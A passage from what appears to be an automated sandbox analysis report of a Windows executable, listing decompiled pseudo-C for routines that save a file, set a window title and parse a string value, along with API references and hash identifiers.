                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ClassCriticalInfoSection$Leave$CursorEnterLoadswprintf
                                                                                                                                                                                                                                                                                          • String ID: 0$ATL:%p
                                                                                                                                                                                                                                                                                          • API String ID: 1916026773-2453800769
                                                                                                                                                                                                                                                                                          • Opcode ID: 03e309b1f0e37d82f844a75f0e50e1959b0b0ef0ac0a8875f16450849c87c28e
                                                                                                                                                                                                                                                                                          • Instruction ID: 392b2d35d4ee852ac8e620b0146b188284fe851cab08ef5ce43d69cfbde4ce04
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03e309b1f0e37d82f844a75f0e50e1959b0b0ef0ac0a8875f16450849c87c28e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC416FB5900204DBDF19DF54D9C4AAA7BB8FF48310F108299EE449B289E7B1ED85CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                                                                                                          			E000F84D0(void* __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                                                                                                          				char _v528;
                                                                                                                                                                                                                                                                                          				int _v532;
                                                                                                                                                                                                                                                                                          				intOrPtr _v552;
                                                                                                                                                                                                                                                                                          				int _v560;
                                                                                                                                                                                                                                                                                          				intOrPtr _v568;
                                                                                                                                                                                                                                                                                          				intOrPtr _v580;
                                                                                                                                                                                                                                                                                          				CHAR* _v584;
                                                                                                                                                                                                                                                                                          				intOrPtr _v588;
                                                                                                                                                                                                                                                                                          				CHAR* _v592;
                                                                                                                                                                                                                                                                                          				int _v608;
                                                                                                                                                                                                                                                                                          				intOrPtr _v612;
                                                                                                                                                                                                                                                                                          				int _v616;
                                                                                                                                                                                                                                                                                          				char _v620;
                                                                                                                                                                                                                                                                                          				int _v624;
                                                                                                                                                                                                                                                                                          				int _v628;
                                                                                                                                                                                                                                                                                          				int _v632;
                                                                                                                                                                                                                                                                                          				int _v648;
                                                                                                                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                                                                                                                          				int _v656;
                                                                                                                                                                                                                                                                                          				CHAR* _v660;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t47;
                                                                                                                                                                                                                                                                                          				intOrPtr _t54;
                                                                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t41 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t41 ^ _t75;
                                                                                                                                                                                                                                                                                          				_t72 = __ecx;
                                                                                                                                                                                                                                                                                          				_v656 = 0;
                                                                                                                                                                                                                                                                                          				_v648 = 0;
                                                                                                                                                                                                                                                                                          				_v632 = 0;
                                                                                                                                                                                                                                                                                          				_v628 = 0;
                                                                                                                                                                                                                                                                                          				_v624 = 0;
                                                                                                                                                                                                                                                                                          				E00106820( &_v620, 0, 0x58);
                                                                                                                                                                                                                                                                                          				_v272 = 0;
                                                                                                                                                                                                                                                                                          				_v528 = 0;
                                                                                                                                                                                                                                                                                          				_v532 = 0;
                                                                                                                                                                                                                                                                                          				_v620 = 0x58;
                                                                                                                                                                                                                                                                                          				if(E000F4890(0, _t72, _t73) != 0) {
                                                                                                                                                                                                                                                                                          					_v620 = 0x4c;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t70 =  &_v528;
                                                                                                                                                                                                                                                                                          				_v592 =  &_v272;
                                                                                                                                                                                                                                                                                          				_v588 = 0x104;
                                                                                                                                                                                                                                                                                          				_v560 = 0;
                                                                                                                                                                                                                                                                                          				_v584 =  &_v528;
                                                                                                                                                                                                                                                                                          				_v580 = 0x100;
                                                                                                                                                                                                                                                                                          				_v568 = 0x880026;
                                                                                                                                                                                                                                                                                          				_v608 = 0;
                                                                                                                                                                                                                                                                                          				_v612 =  *0x170c0c;
                                                                                                                                                                                                                                                                                          				_v552 = E00103D40;
                                                                                                                                                                                                                                                                                          				_v616 = 0;
                                                                                                                                                                                                                                                                                          				_v652 = 0x112d54;
                                                                                                                                                                                                                                                                                          				_t47 = GetActiveWindow();
                                                                                                                                                                                                                                                                                          				_t74 =  &_v652;
                                                                                                                                                                                                                                                                                          				if(E000FADC0(_t47,  &_v652) == 1) {
                                                                                                                                                                                                                                                                                          					_t74 = _t72 + 0x250;
                                                                                                                                                                                                                                                                                          					_t54 = E000F7250(_v592, _t74);
                                                                                                                                                                                                                                                                                          					_v656 = _t54;
                                                                                                                                                                                                                                                                                          					if(_t54 == 0) {
                                                                                                                                                                                                                                                                                          						MessageBoxA( *(_t72 + 4), "Error writing file!\n", 0x11293e, 0);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v660 = _v584;
                                                                                                                                                                                                                                                                                          						lstrcpyA(_t74 + 0x58, _v592);
                                                                                                                                                                                                                                                                                          						_t70 = _t74 + 0x15c;
                                                                                                                                                                                                                                                                                          						lstrcpyA(_t74 + 0x15c, _v660);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t74 + 4), 0xb9, 0, 0);
                                                                                                                                                                                                                                                                                          						E000F8160(_t72);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t49 = _v632;
                                                                                                                                                                                                                                                                                          				if(_v632 != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t49);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E001059E6(_v656, 0, _v8 ^ _t75, _t70, _t72, _t74);
                                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                                          0x000f84d9
                                                                                                                                                                                                                                                                                          0x000f84e0
                                                                                                                                                                                                                                                                                          0x000f84f2
                                                                                                                                                                                                                                                                                          0x000f84f4
                                                                                                                                                                                                                                                                                          0x000f84fa
                                                                                                                                                                                                                                                                                          0x000f8500
                                                                                                                                                                                                                                                                                          0x000f8506
                                                                                                                                                                                                                                                                                          0x000f850c
                                                                                                                                                                                                                                                                                          0x000f8512
                                                                                                                                                                                                                                                                                          0x000f851a
                                                                                                                                                                                                                                                                                          0x000f8520
                                                                                                                                                                                                                                                                                          0x000f8526
                                                                                                                                                                                                                                                                                          0x000f852c
                                                                                                                                                                                                                                                                                          0x000f853d
                                                                                                                                                                                                                                                                                          0x000f853f
                                                                                                                                                                                                                                                                                          0x000f853f
                                                                                                                                                                                                                                                                                          0x000f8554
                                                                                                                                                                                                                                                                                          0x000f855a
                                                                                                                                                                                                                                                                                          0x000f8560
                                                                                                                                                                                                                                                                                          0x000f856a
                                                                                                                                                                                                                                                                                          0x000f8570
                                                                                                                                                                                                                                                                                          0x000f8576
                                                                                                                                                                                                                                                                                          0x000f8580
                                                                                                                                                                                                                                                                                          0x000f858a
                                                                                                                                                                                                                                                                                          0x000f8590
                                                                                                                                                                                                                                                                                          0x000f8596
                                                                                                                                                                                                                                                                                          0x000f85a0
                                                                                                                                                                                                                                                                                          0x000f85a6
                                                                                                                                                                                                                                                                                          0x000f85b0
                                                                                                                                                                                                                                                                                          0x000f85b6
                                                                                                                                                                                                                                                                                          0x000f85c4
                                                                                                                                                                                                                                                                                          0x000f85cc
                                                                                                                                                                                                                                                                                          0x000f85d3
                                                                                                                                                                                                                                                                                          0x000f85d8
                                                                                                                                                                                                                                                                                          0x000f85e0
                                                                                                                                                                                                                                                                                          0x000f863a
                                                                                                                                                                                                                                                                                          0x000f85e2
                                                                                                                                                                                                                                                                                          0x000f85f3
                                                                                                                                                                                                                                                                                          0x000f85f9
                                                                                                                                                                                                                                                                                          0x000f8606
                                                                                                                                                                                                                                                                                          0x000f860d
                                                                                                                                                                                                                                                                                          0x000f861e
                                                                                                                                                                                                                                                                                          0x000f8624
                                                                                                                                                                                                                                                                                          0x000f8624
                                                                                                                                                                                                                                                                                          0x000f85e0
                                                                                                                                                                                                                                                                                          0x000f8640
                                                                                                                                                                                                                                                                                          0x000f8648
                                                                                                                                                                                                                                                                                          0x000f864b
                                                                                                                                                                                                                                                                                          0x000f864b
                                                                                                                                                                                                                                                                                          0x000f8666

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000F8512
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4890: _memset.LIBCMT ref: 000F48B1
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4890: GetVersionExA.KERNEL32(?), ref: 000F48CA
                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 000F85B0
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 000F85F9
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 000F860D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B9,00000000,00000000), ref: 000F861E
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 000F863A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message_memsetlstrcpy$ActiveSendVersionWindow
                                                                                                                                                                                                                                                                                          • String ID: &$Error writing file!$L
                                                                                                                                                                                                                                                                                          • API String ID: 238307538-43552360
                                                                                                                                                                                                                                                                                          • Opcode ID: c7d9fd1dfe6715fb0de3927f2dee9dddac1a2950717d87b902e6b2371e2642fe
                                                                                                                                                                                                                                                                                          • Instruction ID: c055abfa56d266cc0ad7a3c80afa30611f59f3ebe34141abad44f1cb473ae933
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7d9fd1dfe6715fb0de3927f2dee9dddac1a2950717d87b902e6b2371e2642fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 504105B590122D9FCB60EF65DD88AEAB7B8FB08304F1081E9E60DA7240CB705E84CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E000F8160(void* __edi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v264;
                                                                                                                                                                                                                                                                                          				int _v268;
                                                                                                                                                                                                                                                                                          				void* _v276;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                                                                          				CHAR* _t40;
                                                                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                                                                          				CHAR* _t42;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t38 = __edi;
                                                                                                                                                                                                                                                                                          				_t14 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t14 ^ _t41;
                                                                                                                                                                                                                                                                                          				_t30 = __edi + 0x3ac;
                                                                                                                                                                                                                                                                                          				_v268 = lstrlenA(_t30);
                                                                                                                                                                                                                                                                                          				LoadStringA( *0x170c0c, 0x80,  &_v264, 0xff);
                                                                                                                                                                                                                                                                                          				E0010ACA0(lstrlenA( &_v264) + _v268 + 5);
                                                                                                                                                                                                                                                                                          				_t40 = _t42;
                                                                                                                                                                                                                                                                                          				lstrcpyA(_t40, _t30);
                                                                                                                                                                                                                                                                                          				_t31 = lstrcatA;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(__edi + 0x4b4)) != 0) {
                                                                                                                                                                                                                                                                                          					lstrcatA(_t40, "*");
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				lstrcatA(_t40, " - ");
                                                                                                                                                                                                                                                                                          				lstrcatA(_t40,  &_v264);
                                                                                                                                                                                                                                                                                          				SetWindowTextA( *(_t38 + 4), _t40);
                                                                                                                                                                                                                                                                                          				return E001059E6(0, _t31, _v8 ^ _t41,  &_v264, _t38, _t40);
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x000f8160
                                                                                                                                                                                                                                                                                          0x000f8169
                                                                                                                                                                                                                                                                                          0x000f8170
                                                                                                                                                                                                                                                                                          0x000f817b
                                                                                                                                                                                                                                                                                          0x000f818f
                                                                                                                                                                                                                                                                                          0x000f81a2
                                                                                                                                                                                                                                                                                          0x000f81bb
                                                                                                                                                                                                                                                                                          0x000f81c0
                                                                                                                                                                                                                                                                                          0x000f81c4
                                                                                                                                                                                                                                                                                          0x000f81d1
                                                                                                                                                                                                                                                                                          0x000f81d7
                                                                                                                                                                                                                                                                                          0x000f81df
                                                                                                                                                                                                                                                                                          0x000f81df
                                                                                                                                                                                                                                                                                          0x000f81e7
                                                                                                                                                                                                                                                                                          0x000f81f1
                                                                                                                                                                                                                                                                                          0x000f81f8
                                                                                                                                                                                                                                                                                          0x000f8215

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$LoadStringTextWindowlstrcpy
                                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                                          • API String ID: 730805527-3695764949
                                                                                                                                                                                                                                                                                          • Opcode ID: 6e5d94c466ad12c83ef93a5de6b354935c5eb090f15ea2bd576832cc7dcdea4f
                                                                                                                                                                                                                                                                                          • Instruction ID: 77892afc44ce43fde01c49832d3abb3af1785da3d87e6c86509d87ef7c7471cb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e5d94c466ad12c83ef93a5de6b354935c5eb090f15ea2bd576832cc7dcdea4f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67116A71A1022CABD715EB64DD85EEAB7BCFF08304F004195F64997441DBB4AEC48BA4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                          			E000F2D60(void* __ecx, unsigned int __edx, intOrPtr _a4, void** _a8) {
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				char _v4124;
                                                                                                                                                                                                                                                                                          				char _v4384;
                                                                                                                                                                                                                                                                                          				char* _v4388;
                                                                                                                                                                                                                                                                                          				char* _v4392;
                                                                                                                                                                                                                                                                                          				char _v4396;
                                                                                                                                                                                                                                                                                          				char* _v4400;
                                                                                                                                                                                                                                                                                          				void** _v4404;
                                                                                                                                                                                                                                                                                          				intOrPtr _v4408;
                                                                                                                                                                                                                                                                                          				char _v4412;
                                                                                                                                                                                                                                                                                          				unsigned int _v4416;
                                                                                                                                                                                                                                                                                          				void* _v4436;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t91;
                                                                                                                                                                                                                                                                                          				signed int _t92;
                                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                                                                          				signed int _t104;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          				CHAR* _t112;
                                                                                                                                                                                                                                                                                          				signed int _t114;
                                                                                                                                                                                                                                                                                          				signed int _t115;
                                                                                                                                                                                                                                                                                          				int _t119;
                                                                                                                                                                                                                                                                                          				signed int _t121;
                                                                                                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                                                                                                          				signed char _t135;
                                                                                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                                                                                          				intOrPtr _t147;
                                                                                                                                                                                                                                                                                          				signed char _t148;
                                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                                          				signed int _t157;
                                                                                                                                                                                                                                                                                          				signed int _t158;
                                                                                                                                                                                                                                                                                          				unsigned int _t159;
                                                                                                                                                                                                                                                                                          				signed char _t160;
                                                                                                                                                                                                                                                                                          				char _t168;
                                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                                          				signed int* _t190;
                                                                                                                                                                                                                                                                                          				void* _t193;
                                                                                                                                                                                                                                                                                          				int _t198;
                                                                                                                                                                                                                                                                                          				intOrPtr _t201;
                                                                                                                                                                                                                                                                                          				void* _t202;
                                                                                                                                                                                                                                                                                          				CHAR* _t204;
                                                                                                                                                                                                                                                                                          				intOrPtr _t207;
                                                                                                                                                                                                                                                                                          				signed int _t210;
                                                                                                                                                                                                                                                                                          				signed int _t211;
                                                                                                                                                                                                                                                                                          				intOrPtr _t212;
                                                                                                                                                                                                                                                                                          				void* _t214;
                                                                                                                                                                                                                                                                                          				void* _t215;
                                                                                                                                                                                                                                                                                          				intOrPtr _t216;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t182 = __edx;
                                                                                                                                                                                                                                                                                          				_t161 = __ecx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F581);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                                                          				E00108940(0x1130);
                                                                                                                                                                                                                                                                                          				_t91 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t92 = _t91 ^ _t211;
                                                                                                                                                                                                                                                                                          				_v24 = _t92;
                                                                                                                                                                                                                                                                                          				_push(_t92);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v20 = _t212;
                                                                                                                                                                                                                                                                                          				_t201 = _a4;
                                                                                                                                                                                                                                                                                          				_v4404 = _a8;
                                                                                                                                                                                                                                                                                          				_v4408 = _t201;
                                                                                                                                                                                                                                                                                          				_v4400 = __ecx;
                                                                                                                                                                                                                                                                                          				_v4416 = __edx;
                                                                                                                                                                                                                                                                                          				_v4392 = 0;
                                                                                                                                                                                                                                                                                          				if(E000F2BE0( &_v4124, __ecx, _t201) < 0) {
                                                                                                                                                                                                                                                                                          					L65:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					_pop(_t193);
                                                                                                                                                                                                                                                                                          					_pop(_t202);
                                                                                                                                                                                                                                                                                          					_pop(_t155);
                                                                                                                                                                                                                                                                                          					return E001059E6(_t96, _t155, _v24 ^ _t211, _t182, _t193, _t202);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t99 = E000F2AB0( &_v4124,  &_v4392);
                                                                                                                                                                                                                                                                                          				_t214 = _t212 + 4;
                                                                                                                                                                                                                                                                                          				if(_t99 != 0) {
                                                                                                                                                                                                                                                                                          					E000F2B90(_t201);
                                                                                                                                                                                                                                                                                          					_t194 = _t201;
                                                                                                                                                                                                                                                                                          					_t96 = E000F2BE0( &_v4124, _t161, _t201);
                                                                                                                                                                                                                                                                                          					__eflags = _t96;
                                                                                                                                                                                                                                                                                          					if(_t96 < 0) {
                                                                                                                                                                                                                                                                                          						goto L65;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t102 = _v4392 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					__eflags = _t102 - 0x13;
                                                                                                                                                                                                                                                                                          					if(__eflags > 0) {
                                                                                                                                                                                                                                                                                          						__eflags = _t102 - 0x4008;
                                                                                                                                                                                                                                                                                          						if(_t102 != 0x4008) {
                                                                                                                                                                                                                                                                                          							L64:
                                                                                                                                                                                                                                                                                          							_t104 = E000F2BE0(_v4416, _t161, _v4408);
                                                                                                                                                                                                                                                                                          							__eflags = _t104;
                                                                                                                                                                                                                                                                                          							_t182 = (__eflags > 0) - 1;
                                                                                                                                                                                                                                                                                          							_t96 = _t104 & (__eflags > 0x00000000) - 0x00000001;
                                                                                                                                                                                                                                                                                          							__eflags = _t104 & (__eflags > 0x00000000) - 0x00000001;
                                                                                                                                                                                                                                                                                          							goto L65;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t182 =  &_v4124;
                                                                                                                                                                                                                                                                                          						_t106 = lstrlenA( &_v4124) + 2;
                                                                                                                                                                                                                                                                                          						_v4388 = 0;
                                                                                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          						if(0 > 0) {
                                                                                                                                                                                                                                                                                          							L43:
                                                                                                                                                                                                                                                                                          							_push(0x80070216);
                                                                                                                                                                                                                                                                                          							_t106 = E000F1170(_t182);
                                                                                                                                                                                                                                                                                          							L44:
                                                                                                                                                                                                                                                                                          							__eflags = _t106 - 0x100;
                                                                                                                                                                                                                                                                                          							if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                          								_t182 =  &_v4384;
                                                                                                                                                                                                                                                                                          								_v4388 =  &_v4384;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								E000FFF60(_t106, _t182, _t194, 0, __eflags,  &_v4388);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t157 = _v4388;
                                                                                                                                                                                                                                                                                          							__eflags = _t157;
                                                                                                                                                                                                                                                                                          							if(_t157 == 0) {
                                                                                                                                                                                                                                                                                          								_t158 = 0xe;
                                                                                                                                                                                                                                                                                          								goto L60;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _v4124;
                                                                                                                                                                                                                                                                                          								_t204 =  &_v4124;
                                                                                                                                                                                                                                                                                          								if(_v4124 == 0) {
                                                                                                                                                                                                                                                                                          									L58:
                                                                                                                                                                                                                                                                                          									_t182 = _v4400;
                                                                                                                                                                                                                                                                                          									 *_t157 = 0;
                                                                                                                                                                                                                                                                                          									_t158 = E000F18D0(_v4404, _v4400, _v4388);
                                                                                                                                                                                                                                                                                          									L60:
                                                                                                                                                                                                                                                                                          									_t161 =  &_v4384;
                                                                                                                                                                                                                                                                                          									__eflags = _v4388 -  &_v4384;
                                                                                                                                                                                                                                                                                          									if(_v4388 !=  &_v4384) {
                                                                                                                                                                                                                                                                                          										E000FD040( &_v4388);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									L62:
                                                                                                                                                                                                                                                                                          									__eflags = _t158;
                                                                                                                                                                                                                                                                                          									if(_t158 == 0) {
                                                                                                                                                                                                                                                                                          										goto L64;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t96 = E000F1400(_t158);
                                                                                                                                                                                                                                                                                          									goto L65;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									_t112 = CharNextA(_t204);
                                                                                                                                                                                                                                                                                          									_t168 =  *_t204;
                                                                                                                                                                                                                                                                                          									__eflags = _t168 - 0x5c;
                                                                                                                                                                                                                                                                                          									if(_t168 != 0x5c) {
                                                                                                                                                                                                                                                                                          										L53:
                                                                                                                                                                                                                                                                                          										 *_t157 = _t168;
                                                                                                                                                                                                                                                                                          										_t114 = IsDBCSLeadByte( *_t204 & 0x000000ff);
                                                                                                                                                                                                                                                                                          										__eflags = _t114;
                                                                                                                                                                                                                                                                                          										if(_t114 == 0) {
                                                                                                                                                                                                                                                                                          											L56:
                                                                                                                                                                                                                                                                                          											_t157 = _t157 + 1;
                                                                                                                                                                                                                                                                                          											_t204 =  &(_t204[1]);
                                                                                                                                                                                                                                                                                          											__eflags = _t204;
                                                                                                                                                                                                                                                                                          											goto L57;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t115 = _t204[1];
                                                                                                                                                                                                                                                                                          										_t204 =  &(_t204[1]);
                                                                                                                                                                                                                                                                                          										_t157 = _t157 + 1;
                                                                                                                                                                                                                                                                                          										__eflags = _t115;
                                                                                                                                                                                                                                                                                          										if(_t115 == 0) {
                                                                                                                                                                                                                                                                                          											goto L58;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										 *_t157 = _t115;
                                                                                                                                                                                                                                                                                          										goto L56;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									__eflags =  *_t112 - 0x30;
                                                                                                                                                                                                                                                                                          									if( *_t112 != 0x30) {
                                                                                                                                                                                                                                                                                          										goto L53;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *_t157 = 0;
                                                                                                                                                                                                                                                                                          									_t157 = _t157 + 1;
                                                                                                                                                                                                                                                                                          									_t204 = CharNextA(_t112);
                                                                                                                                                                                                                                                                                          									L57:
                                                                                                                                                                                                                                                                                          									__eflags =  *_t204;
                                                                                                                                                                                                                                                                                          								} while ( *_t204 != 0);
                                                                                                                                                                                                                                                                                          								goto L58;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
